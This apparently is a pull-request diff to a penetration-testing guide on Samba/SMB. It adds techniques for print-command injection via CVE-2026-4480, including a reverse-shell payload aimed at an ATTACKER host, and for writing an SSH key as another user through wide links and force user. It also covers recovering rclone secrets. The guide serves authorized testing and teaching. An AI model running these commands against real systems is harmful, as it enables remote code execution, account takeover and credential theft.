Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
114 changes: 104 additions & 10 deletions src/network-services-pentesting/pentesting-smb/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -449,19 +449,109 @@ The **default config of** a **Samba** server is usually located in `/etc/samba/s

| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Allow listing available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without using a password? |
| `enable privileges = yes` | Honor privileges assigned to specific SID? |
| `create mask = 0777` | What permissions must be assigned to the newly created files? |
| `directory mask = 0777` | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script should be executed when the script gets closed? |
| `magic output = script.out` | Where the output of the magic script needs to be stored? |
| `browseable = yes` | Allow listing available shares in the current share? |
| `read only = no` | Forbid the creation and modification of files? |
| `writable = yes` | Allow users to create and modify files? |
| `guest ok = yes` | Allow connecting to the service without using a password? |
| `printable = yes` | Expose the share as a printer queue instead of a disk share? |
| `print command = ... %J %s` | Run a shell command on the server with client-controlled job metadata? |
| `enable privileges = yes` | Honor privileges assigned to specific SID? |
| `force user = <name>` | Perform every file operation as another UNIX user after authentication? |
| `wide links = yes` | Allow the share to follow symlinks outside the exported directory tree? |
| `allow insecure wide links = yes` | Disable Samba's safety coupling between `wide links` and UNIX extensions? |
| `create mask = 0777` | What permissions must be assigned to the newly created files? |
| `directory mask = 0777` | What permissions must be assigned to the newly created directories? |
| `logon script = script.sh` | What script needs to be executed on the user's login? |
| `magic script = script.sh` | Which script should be executed when the script gets closed? |
| `magic output = script.out` | Where the output of the magic script needs to be stored? |

The command `smbstatus` gives information about the **server** and about **who is connected**.

### Printable shares and shell-based `print command` injection

A **printer share** may look uninteresting because `ls` fails, but it can still accept jobs via `smbclient`'s `print <filename>` command. Enumerate them with:

```bash
smbclient -L //<IP>/ -N
rpcclient -N -U "" <IP> -c 'enumprinters; netshareenumall'
```

If the server-side share uses a shell-based `print command`, treat any `print command` line containing `%J` as high risk. NVD describes CVE-2026-4480 as Samba passing the **client-controlled job description string** into `print command` via `%J` without escaping shell metacharacters, turning the print job name into an OS command injection primitive.

Typical risky pattern:

```ini
[printer]
path = /var/spool/samba
printable = yes
guest ok = yes
print command = /usr/local/bin/print-helper %J %s
```

Quick checks and abuse ideas:

```bash
# confirm the share is printable even if directory listing fails
smbclient //<IP>/PRINTER -N
smb: \> print payload

# search local configs after foothold on the server
grep -R "^[[:space:]]*print command\|%J\|printable\|guest ok" /etc/samba 2>/dev/null

# if %J is injected into a shell command, the job name itself becomes interesting
echo 'id' > '|sh'
smbclient //<IP>/PRINTER -N -c 'print "|sh"'

echo 'bash -i >& /dev/tcp/ATTACKER/443 0>&1' > '|bash'
smbclient //<IP>/PRINTER -N -c 'print "|bash"'
```

The same primitive can also be reached over the `\pipe\spoolss` RPC endpoint: open the printer, set `DocumentInfo1.document_name` to the malicious job name that should land in `%J`, write the body as the spool data, and finish the job to trigger the print command.

### `wide links` + `force user` = write outside the share as another UNIX user

`wide links = yes` lets Samba follow symlinks that point **outside** the exported path. The official Samba docs note that this is normally constrained by UNIX extensions, and that `allow insecure wide links = yes` removes that protection. If the same share also sets `force user = <victim>`, then an authenticated user can make Samba **write as the forced UNIX account**.

High-value combination:

```ini
[transfer]
path = /srv/transfer
valid users = scott
force user = marcus
read only = no
wide links = yes

[global]
allow insecure wide links = yes
unix extensions = no
```

Abuse flow:

```bash
# from a shell on the Samba server
ln -s /home/marcus /srv/transfer/marcus

# traverse the symlink over SMB, not locally
smbclient //<IP>/transfer -U scott%PASSWORD
smb: \> ls
smb: \> cd marcus
smb: \marcus\> mkdir .ssh
smb: \marcus\> put ~/.ssh/id_ed25519.pub .ssh/authorized_keys
```

The important nuance is that local filesystem access may still fail for the attacker, but SMB traversal succeeds because Samba performs the operation as the **forced user**, not as the account that authenticated to the share.

### Loot readable backup configs after Samba footholds

After landing on a Samba host, look for backup/sync configs such as `rclone.conf`. Rclone documents that config passwords are only **obscured**, not securely protected, so readable config files can expose reusable secrets:

```bash
find / -name rclone.conf 2>/dev/null
rclone reveal <obscured_secret>
```

## Authenticate using Kerberos

You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:
Expand Down Expand Up @@ -684,6 +774,10 @@ Entry_6:

## References

- [0xdf - HTB Abducted](https://0xdf.gitlab.io/2026/07/07/htb-abducted.html)
- [Samba `smb.conf` man page](https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html)
- [NVD - CVE-2026-4480](https://nvd.nist.gov/vuln/detail/CVE-2026-4480)
- [Rclone `obscure` documentation](https://rclone.org/commands/rclone_obscure/)
- [NetExec (CME) wiki – Kerberos usage](https://www.netexec.wiki/)
- [Pentesting Kerberos (88) – client setup and troubleshooting](../pentesting-kerberos-88/README.md)
- [ShareHound (collector)](https://github.com/p0dalirius/sharehound)
Expand Down